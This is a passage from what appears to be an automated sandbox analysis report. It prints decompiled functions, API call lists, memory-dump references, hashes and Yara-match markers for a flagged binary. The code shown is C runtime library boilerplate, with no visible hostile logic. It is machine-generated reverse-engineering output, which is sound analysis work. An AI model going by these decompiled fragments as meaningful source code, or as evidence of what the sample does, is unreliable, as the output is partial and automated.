                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: LockitLockit::_std::_$Exception@8H_prologIncrefRegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_std::locale::facet::facet_
                                                                                      • String ID: bad cast
                                                                                      • API String ID: 1536243051-3145022300
                                                                                      • Opcode ID: 227b96fff5f8588e0cf2f675bde784d4bea22e7613f21d31d4d0d397b2153332
                                                                                      • Instruction ID: ab39d80ecd0844aabfef37ee2d8a10b68e059950bc7d2041521cb76376169d08
                                                                                      • Opcode Fuzzy Hash: 227b96fff5f8588e0cf2f675bde784d4bea22e7613f21d31d4d0d397b2153332
                                                                                      • Instruction Fuzzy Hash: 7F3103719001209FCB14EFA4DA858AEBB74BB25324B15057FE812772F1DB786E46CB5C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 97%
                                                                                      			E00404D22(void* __edx, intOrPtr _a4) {
                                                                                      				intOrPtr _v8;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				intOrPtr _t13;
                                                                                      				void* _t19;
                                                                                      				void* _t22;
                                                                                      				signed int _t27;
                                                                                      				intOrPtr _t42;
                                                                                      				void* _t44;
                                                                                      				intOrPtr* _t46;
                                                                                      
                                                                                      				_t42 = E00408A15( *0x4b94d0);
                                                                                      				_v8 = _t42;
                                                                                      				_t46 = E00408A15( *0x4b94cc);
                                                                                      				if(_t46 < _t42) {
                                                                                      					L11:
                                                                                      					_t13 = 0;
                                                                                      					__eflags = 0;
                                                                                      				} else {
                                                                                      					_t27 = _t46 - _t42;
                                                                                      					_t2 = _t27 + 4; // 0x4
                                                                                      					_t50 = _t2 - 4;
                                                                                      					if(_t2 < 4) {
                                                                                      						goto L11;
                                                                                      					} else {
                                                                                      						_push(_t42);
                                                                                      						_t44 = E0040B816(_t27, __edx, _t42, _t46, _t50);
                                                                                      						_t3 = _t27 + 4; // 0x4
                                                                                      						if(_t44 >= _t3) {
                                                                                      							L10:
                                                                                      							 *_t46 = E0040899A(_a4);
                                                                                      							 *0x4b94cc = E0040899A(_t46 + 4);
                                                                                      							_t13 = _a4;
                                                                                      						} else {
                                                                                      							_t19 = 0x800;
                                                                                      							if(_t44 < 0x800) {
                                                                                      								_t19 = _t44;
                                                                                      							}
                                                                                      							_t20 = _t19 + _t44;
                                                                                      							if(_t19 + _t44 < _t44) {
                                                                                      								L7:
                                                                                      								_t5 = _t44 + 0x10; // 0x10
                                                                                      								_t21 = _t5;
                                                                                      								if(_t5 < _t44) {
                                                                                      									goto L11;
                                                                                      								} else {
                                                                                      									_t22 = E0040678A(_v8, _t21);
                                                                                      									if(_t22 == 0) {
                                                                                      										goto L11;
                                                                                      									} else {
                                                                                      										goto L9;
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t22 = E0040678A(_v8, _t20);
                                                                                      								if(_t22 != 0) {
                                                                                      									L9:
                                                                                      									_t46 = _t22 + (_t27 >> 2) * 4;
                                                                                      									 *0x4b94d0 = E0040899A(_t22);
                                                                                      									goto L10;
                                                                                      								} else {
                                                                                      									goto L7;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t13;
                                                                                      			}

                                                                                      0x00404d3c
                                                                                      0x00404d3e
                                                                                      0x00404d46
                                                                                      0x00404d4c
                                                                                      0x00404dd5
                                                                                      0x00404dd5
                                                                                      0x00404dd5
                                                                                      0x00404d52
                                                                                      0x00404d54
                                                                                      0x00404d56
                                                                                      0x00404d59
                                                                                      0x00404d5c
                                                                                      0x00000000
                                                                                      0x00404d5e
                                                                                      0x00404d5e
                                                                                      0x00404d64
                                                                                      0x00404d66
                                                                                      0x00404d6c
                                                                                      0x00404db6
                                                                                      0x00404dbe
                                                                                      0x00404dca
                                                                                      0x00404dcf
                                                                                      0x00404d6e
                                                                                      0x00404d6e
                                                                                      0x00404d75
                                                                                      0x00404d77
                                                                                      0x00404d77
                                                                                      0x00404d79
                                                                                      0x00404d7d
                                                                                      0x00404d8e
                                                                                      0x00404d8e
                                                                                      0x00404d8e
                                                                                      0x00404d93
                                                                                      0x00000000
                                                                                      0x00404d95
                                                                                      0x00404d99
                                                                                      0x00404da2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404da2
                                                                                      0x00404d7f
                                                                                      0x00404d83
                                                                                      0x00404d8c
                                                                                      0x00404da4
                                                                                      0x00404da8
                                                                                      0x00404db1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404d8c
                                                                                      0x00404d7d
                                                                                      0x00404d6c
                                                                                      0x00404d5c
                                                                                      0x00404ddb

                                                                                      APIs
                                                                                      • __decode_pointer.LIBCMT ref: 00404D31
                                                                                        • Part of subcall function 00408A15: TlsGetValue.KERNEL32(00000000,?,00408AB0), ref: 00408A27
                                                                                        • Part of subcall function 00408A15: TlsGetValue.KERNEL32(00000001,?,00408AB0), ref: 00408A3E
                                                                                      • __decode_pointer.LIBCMT ref: 00404D41
                                                                                        • Part of subcall function 00408A15: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00408AB0), ref: 00408A54
                                                                                        • Part of subcall function 00408A15: __crt_waiting_on_module_handle.LIBCMT ref: 00408A5F
                                                                                        • Part of subcall function 00408A15: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00408A6F
                                                                                      • __msize.LIBCMT ref: 00404D5F
                                                                                      • __realloc_crt.LIBCMT ref: 00404D83
                                                                                      • __realloc_crt.LIBCMT ref: 00404D99
                                                                                      • __encode_pointer.LIBCMT ref: 00404DAB
                                                                                      • __encode_pointer.LIBCMT ref: 00404DB9
                                                                                      • __encode_pointer.LIBCMT ref: 00404DC4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: __encode_pointer$Value__decode_pointer__realloc_crt$AddressHandleModuleProc__crt_waiting_on_module_handle__msize
                                                                                      • String ID:
                                                                                      • API String ID: 2836500094-0
                                                                                      • Opcode ID: 9fd23f137018e5086ea670d3691d770b197e2dda82e7aedc22f322629f147f2f
                                                                                      • Instruction ID: ee0d79a7a5e188716b9310d7c5dbe2c3378bc894bca3bf637bddfd72b35f001b
                                                                                      • Opcode Fuzzy Hash: 9fd23f137018e5086ea670d3691d770b197e2dda82e7aedc22f322629f147f2f
                                                                                      • Instruction Fuzzy Hash: 4B11D6B2604115AFDB01AB29ED818AA37EAEEC1368324453FE649F71D0FF39DC51464C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __getptd_noexit.LIBCMT ref: 009066DD
                                                                                        • Part of subcall function 008659BF: __calloc_crt.LIBCMT ref: 008659E2
                                                                                        • Part of subcall function 008659BF: __initptd.LIBCMT ref: 00865A04
                                                                                      • __calloc_crt.LIBCMT ref: 00906700
                                                                                      • __get_sys_err_msg.LIBCMT ref: 0090671E
                                                                                      • __invoke_watson.LIBCMT ref: 0090673B
                                                                                      • __get_sys_err_msg.LIBCMT ref: 0090676D
                                                                                      • __invoke_watson.LIBCMT ref: 0090678B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                      • String ID:
                                                                                      • API String ID: 4066021419-0
                                                                                      • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                      • Instruction ID: ecbf033b0239f4899a02fc7a13e4caf1014e5fe77cd67d29d06933ba412f6632
                                                                                      • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                      • Instruction Fuzzy Hash: 0511C4326017146FEB21762DDC02ABF738CEF40764F110426FD48DA282E732DD2042D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E0040BC19(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                      				intOrPtr _t48;
                                                                                      				intOrPtr _t57;
                                                                                      				void* _t58;
                                                                                      				void* _t61;
                                                                                      
                                                                                      				_t61 = __eflags;
                                                                                      				_t53 = __edx;
                                                                                      				_push(0x2c);
                                                                                      				_push(0x4ab8a8);
                                                                                      				E004080B0(__ebx, __edi, __esi);
                                                                                      				_t48 = __ecx;
                                                                                      				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                                                      				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                                                      				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                                                      				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                                                      				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                                                      				 *((intOrPtr*)(_t58 - 0x28)) = E00405141(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                                                      				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00408C61(__ecx, __edx, _t55, _t61) + 0x88));
                                                                                      				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00408C61(_t48, __edx, _t55, _t61) + 0x8c));
                                                                                      				 *((intOrPtr*)(E00408C61(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
                                                                                      				 *((intOrPtr*)(E00408C61(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                                                                      				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                      				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                                                                      				 *(_t58 - 4) = 1;
                                                                                      				 *((intOrPtr*)(_t58 - 0x1c)) = E004051E6(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                                                                      				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                      				 *(_t58 - 4) = 0xfffffffe;
                                                                                      				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                                                      				E0040BD3F(_t48, _t53, _t55, _t57, _t61);
                                                                                      				return E004080F5( *((intOrPtr*)(_t58 - 0x1c)));
                                                                                      			}

                                                                                      0x0040bc19
                                                                                      0x0040bc19
                                                                                      0x0040bc19
                                                                                      0x0040bc1b
                                                                                      0x0040bc20
                                                                                      0x0040bc25
                                                                                      0x0040bc27
                                                                                      0x0040bc2a
                                                                                      0x0040bc2d
                                                                                      0x0040bc30
                                                                                      0x0040bc37
                                                                                      0x0040bc48
                                                                                      0x0040bc56
                                                                                      0x0040bc64
                                                                                      0x0040bc6c
                                                                                      0x0040bc7a
                                                                                      0x0040bc80
                                                                                      0x0040bc87
                                                                                      0x0040bc8a
                                                                                      0x0040bca0
                                                                                      0x0040bca3
                                                                                      0x0040bd18
                                                                                      0x0040bd1f
                                                                                      0x0040bd26
                                                                                      0x0040bd33

                                                                                      APIs
                                                                                      • __CreateFrameInfo.LIBCMT ref: 0040BC41
                                                                                        • Part of subcall function 00405141: __getptd.LIBCMT ref: 0040514F
                                                                                        • Part of subcall function 00405141: __getptd.LIBCMT ref: 0040515D
                                                                                      • __getptd.LIBCMT ref: 0040BC4B
                                                                                        • Part of subcall function 00408C61: __getptd_noexit.LIBCMT ref: 00408C64
                                                                                        • Part of subcall function 00408C61: __amsg_exit.LIBCMT ref: 00408C71
                                                                                      • __getptd.LIBCMT ref: 0040BC59
                                                                                      • __getptd.LIBCMT ref: 0040BC67
                                                                                      • __getptd.LIBCMT ref: 0040BC72
                                                                                      • _CallCatchBlock2.LIBCMT ref: 0040BC98
                                                                                        • Part of subcall function 004051E6: __CallSettingFrame@12.LIBCMT ref: 00405232
                                                                                        • Part of subcall function 0040BD3F: __getptd.LIBCMT ref: 0040BD4E
                                                                                        • Part of subcall function 0040BD3F: __getptd.LIBCMT ref: 0040BD5C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                      • String ID:
                                                                                      • API String ID: 1602911419-0
                                                                                      • Opcode ID: 86b47c6857254feccd88310b567089e0ead91099dc9c1b65870741aea1de490e
                                                                                      • Instruction ID: 0debe1b14ca3a735202e724f585256bbada5f7403a25a02b8e95732e92b8ad28
                                                                                      • Opcode Fuzzy Hash: 86b47c6857254feccd88310b567089e0ead91099dc9c1b65870741aea1de490e
                                                                                      • Instruction Fuzzy Hash: 6011F971C002099FDB00EFA5C985B9EBBB0FF04315F14807EF854A7292DB389A159F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 43%
                                                                                      			E00401689() {
                                                                                      				signed char _t23;
                                                                                      				void* _t28;
                                                                                      				void* _t34;
                                                                                      				void* _t38;
                                                                                      
                                                                                      				E004A6CC8(E004A6F20, _t38);
                                                                                      				_t23 =  *(_t34 + 0xc) &  *(_t34 + 8);
                                                                                      				if((_t23 & 0x00000004) == 0) {
                                                                                      					L4:
		_t40 = _t23 & 0x00000002;
		if((_t23 & 0x00000002) == 0) {
			E00401CD9(_t38 - 0x70, "ios_base::eofbit set");
			_push(_t38 - 0x70);
			_push(_t38 - 0x98);
			*(_t38 - 4) = 2;
			E0040163D(__eflags);
			_push(0x4abb90);
			_t28 = _t38 - 0x98;
			L3:
			_push(_t28);
			_t23 = E004052D2();
			goto L4;
		}
		E00401CD9(_t38 - 0x2c, "ios_base::failbit set");
		*(_t38 - 4) = 1;
		L2:
		_push(_t38 - 0x2c);
		_push(_t38 - 0x54);
		E0040163D(_t40);
		_push(0x4abb90);
		_t28 = _t38 - 0x54;
		goto L3;
	}
	E00401CD9(_t38 - 0x2c, "ios_base::badbit set");
	_t6 = _t38 - 4;
	*_t6 = *(_t38 - 4) & 0x00000000;
	_t40 = *_t6;
	goto L2;
}

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: Exception@8H_prologThrow
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 3222999186-1866435925
• Opcode ID: 87d3203da5ccdc872c2b7ff9653e6d2ee29615d5a3bf8c40d1c561cd24c06900
• Instruction ID: a80709d98f64061725cf21bd3e7cc156939d23d4beb78a6d76d1c6feba328024
• Opcode Fuzzy Hash: 87d3203da5ccdc872c2b7ff9653e6d2ee29615d5a3bf8c40d1c561cd24c06900
• Instruction Fuzzy Hash: 0E0112718501089AD700EBE5CC46FDD737CAF15308F64846BE006761A6DB7E9A099B28
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 73%
E0040B968(void* __edx, void* __esi, intOrPtr* _a4) {
	signed int _v8;
	intOrPtr _t11;
	intOrPtr* _t15;
	intOrPtr* _t19;
	void* _t23;
	void* _t25;

	_t24 = __edx;
	_t11 = *((intOrPtr*)( *_a4));
	if(_t11 == 0xe0434f4d) {
		__eflags = *((intOrPtr*)(E00408C61(_t23, __edx, _t25, __eflags) + 0x90));
		if(__eflags > 0) {
			_t15 = E00408C61(_t23, __edx, _t25, __eflags) + 0x90;
			*_t15 = *_t15 - 1;
			__eflags = *_t15;
		}
		goto L5;
	} else {
		_t32 = _t11 - 0xe06d7363;
		if(_t11 != 0xe06d7363) {
			L5:
			__eflags = 0;
			return 0;
		} else {
			*(E00408C61(_t23, __edx, _t25, _t32) + 0x90) = *(_t16 + 0x90) & 0x00000000;
			_push(8);
			_push(0x4ab948);
			E004080B0(_t23, _t25, __esi);
			_t19 = *((intOrPtr*)(E00408C61(_t23, __edx, _t25, _t32) + 0x78));
			if(_t19 != 0) {
				_v8 = _v8 & 0x00000000;
				*_t19();
				_v8 = 0xfffffffe;
			}
			return E004080F5(E00404C0B(_t23, _t24, _t25));
		}
	}
}

APIs
• __getptd.LIBCMT ref: 0040B982
  • Part of subcall function 00408C61: __getptd_noexit.LIBCMT ref: 00408C64
  • Part of subcall function 00408C61: __amsg_exit.LIBCMT ref: 00408C71
• __getptd.LIBCMT ref: 0040B993
• __getptd.LIBCMT ref: 0040B9A1
Strings
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: __getptd$__amsg_exit__getptd_noexit
• String ID: MOC$csm
• API String ID: 803148776-1389381023
• Opcode ID: bfa9a103a35016602e4115c8ddd52ff22a37d0e9f9d7e3ae51fd8bde65f33129
• Instruction ID: d834f262890598c472e4d9ba4fd5a43c961720595d1b26673d2cfce027734a2a
• Opcode Fuzzy Hash: bfa9a103a35016602e4115c8ddd52ff22a37d0e9f9d7e3ae51fd8bde65f33129
• Instruction Fuzzy Hash: 2FE04F75504204CFD710AB79C58AB2933A4EF49319F2901BBE58CD73A2DB3CE850A59F
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
• Instruction ID: 2d3e01d75bf362032bd9832fca257f685710968eae8996b615a035281c416a28
• Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
• Instruction Fuzzy Hash: 7651C330A00B0ADBDB259F69888066E77B5FF40334F2687A9F835D62D0DB749D50DB41
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%
E00409DCB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
	signed int _t15;
	LONG* _t21;
	long _t23;
	void* _t31;
	LONG* _t33;
	void* _t34;
	void* _t35;

	_t35 = __eflags;
	_t29 = __edx;
	_t25 = __ebx;
	_push(0xc);
	_push(0x4ab768);
	E004080B0(__ebx, __edi, __esi);
	_t31 = E00408C61(__ebx, __edx, __edi, _t35);
	_t15 = *0x4adc98; // 0xfffffffe
	if(( *(_t31 + 0x70) & _t15) == 0 || *((intOrPtr*)(_t31 + 0x6c)) == 0) {
		E004075B9(_t25, 0xd);
		*(_t34 - 4) = *(_t34 - 4) & 0x00000000;
		_t33 = *(_t31 + 0x68);
		*(_t34 - 0x1c) = _t33;
		__eflags = _t33 - *0x4adba0; // 0x7917d8
		if(__eflags != 0) {
			__eflags = _t33;
			if(_t33 != 0) {
				_t23 = InterlockedDecrement(_t33);
				__eflags = _t23;
				if(_t23 == 0) {
					__eflags = _t33 - 0x4ad778;
					if(__eflags != 0) {
						_push(_t33);
						E00403B26(_t25, _t31, _t33, __eflags);
					}
				}
			}
			_t21 = *0x4adba0; // 0x7917d8
			*(_t31 + 0x68) = _t21;
			_t33 = *0x4adba0; // 0x7917d8
			*(_t34 - 0x1c) = _t33;
			InterlockedIncrement(_t33);
		}
		*(_t34 - 4) = 0xfffffffe;
		E00409E66();
	} else {
		_t33 = *(_t31 + 0x68);
	}
	if(_t33 == 0) {
		E004083EA(_t29, _t31, 0x20);
	}
	return E004080F5(_t33);
}

APIs
• __getptd.LIBCMT ref: 00409DD7
  • Part of subcall function 00408C61: __getptd_noexit.LIBCMT ref: 00408C64
  • Part of subcall function 00408C61: __amsg_exit.LIBCMT ref: 00408C71
• __amsg_exit.LIBCMT ref: 00409DF7
• __lock.LIBCMT ref: 00409E07
• InterlockedDecrement.KERNEL32(?), ref: 00409E24
• InterlockedIncrement.KERNEL32(007917D8), ref: 00409E4F
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0
• Opcode ID: b5713b4f30f0c924c1af7cf02b884a3a08681e88c898df7691b1bf86249d423f
• Instruction ID: 780197a80d9c4ec97f989673480b3a6a1a38f0117634969727c0026079deb8f3
• Opcode Fuzzy Hash: b5713b4f30f0c924c1af7cf02b884a3a08681e88c898df7691b1bf86249d423f
• Instruction Fuzzy Hash: A7017C32D04611EBC721AB26D84575A7B60AF01B14F46403BE804736D2CB3C6D41DAED
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 41%
E00403B26(void* __ebx, void* __edi, void* __esi, void* __eflags) {
	intOrPtr* _t10;
	intOrPtr _t13;
	intOrPtr _t23;
	void* _t25;

	_push(0xc);
	_push(0x4ab4c8);
	_t8 = E004080B0(__ebx, __edi, __esi);
	_t23 =  *((intOrPtr*)(_t25 + 8));
	if(_t23 == 0) {
		L9:
		return E004080F5(_t8);
	}
	if( *0x4b94f4 != 3) {
		_push(_t23);
		L7:
		_t8 = HeapFree( *0x4af848, 0, ??);
		_t31 = _t8;
		if(_t8 == 0) {
			_t10 = E004046FF(_t31);
			 *_t10 = E004046BD(GetLastError());
		}
		goto L9;
	}
	E004075B9(__ebx, 4);
	 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
	_t13 = E004075EC(_t23);
	 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
	if(_t13 != 0) {
		_push(_t23);
		_push(_t13);
		E0040761C();
	}
	 *(_t25 - 4) = 0xfffffffe;
	_t8 = E00403B7C();
	if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
		goto L9;
	} else {
		_push( *((intOrPtr*)(_t25 + 8)));
		goto L7;
	}
}








APIs
• __lock.LIBCMT ref: 00403B44
  • Part of subcall function 004075B9: __mtinitlocknum.LIBCMT ref: 004075CF
  • Part of subcall function 004075B9: __amsg_exit.LIBCMT ref: 004075DB
  • Part of subcall function 004075B9: EnterCriticalSection.KERNEL32(00408C04,00408C04,?,0040831D,00000004,004AB650,0000000C,00406754,00000001,00408C13,00000000,00000000,00000000,?,00408C13,00000001), ref: 004075E3
• ___sbh_find_block.LIBCMT ref: 00403B4F
• ___sbh_free_block.LIBCMT ref: 00403B5E
• HeapFree.KERNEL32(00000000,00000001,004AB4C8,0000000C,0040759A,00000000,004AB630,0000000C,004075D4,00000001,00408C04,?,0040831D,00000004,004AB650,0000000C), ref: 00403B8E
• GetLastError.KERNEL32(?,0040831D,00000004,004AB650,0000000C,00406754,00000001,00408C13,00000000,00000000,00000000,?,00408C13,00000001,00000214), ref: 00403B9F
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
• String ID:
• API String ID: 2714421763-0
• Opcode ID: a41e09eb454143b2dffd0775211ed32df59d1f4dc7de7b489de1431ef860ce1b
• Instruction ID: e16b63266c42bc1a039e8dc6048d318df18703d89f23cf521f4c63627a2e4780
• Opcode Fuzzy Hash: a41e09eb454143b2dffd0775211ed32df59d1f4dc7de7b489de1431ef860ce1b
• Instruction Fuzzy Hash: D0018431805601AADB207F729C09B5F3E789F01329F10053FF504761D2DB3CA640CAAD
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: _memset
• String ID: D
• API String ID: 2102423945-2746444292
• Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
• Instruction ID: bbfe2bf48be59de28dc210ac51ff6aee7de2674ab9abb4713081b1659473da5b
• Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
• Instruction Fuzzy Hash: CEE15C71D00219AACF24DBA4DD89FEEBBB8FF04305F1440A9E909E6190EB746A49CF55
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Yara matches
Similarity
• API ID: _memset
• String ID: $$$(
• API String ID: 2102423945-3551151888
• Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
• Instruction ID: 39ba8c286534b72b088a6d15923d15481065cc0a134a9d2a8b12f2a983c5fee1
• Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
• Instruction Fuzzy Hash: 45919F71D0021C9AEF21CFA4DC5ABEEBBB4FF05304F244169E505BB281DBB65A48CB65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 28%
E0040BFC6(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
	void* __ebp;
	void* _t20;
	void* _t22;
	void* _t23;
	void* _t25;
	intOrPtr* _t26;
	void* _t27;
	void* _t28;

	_t27 = __esi;
	_t26 = __edi;
	_t25 = __edx;
	_t23 = __ecx;
	_t22 = __ebx;
	_t30 = _a20;
	if(_a20 != 0) {
		_push(_a20);
		_push(__ebx);
		_push(__esi);
		_push(_a4);
		E0040BF34(__ebx, __edi, __esi, _t30);
		_t28 = _t28 + 0x10;
	}
	_t31 = _a28;
	_push(_a4);
	if(_a28 != 0) {
		_push(_a28);
	} else {
		_push(_t27);
	}
	E00404E99(_t23);
	_push( *_t26);
	_push(_a16);
	_push(_a12);
	_push(_t27);
	E0040B9B1(_t22, _t25, _t26, _t27, _t31);
	_push(0x100);
	_push(_a24);
	_push(_a16);
	 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
	_push(_a8);
	_push(_t27);
	_push(_a4);
	_t20 = E0040BC19(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
	if(_t20 != 0) {
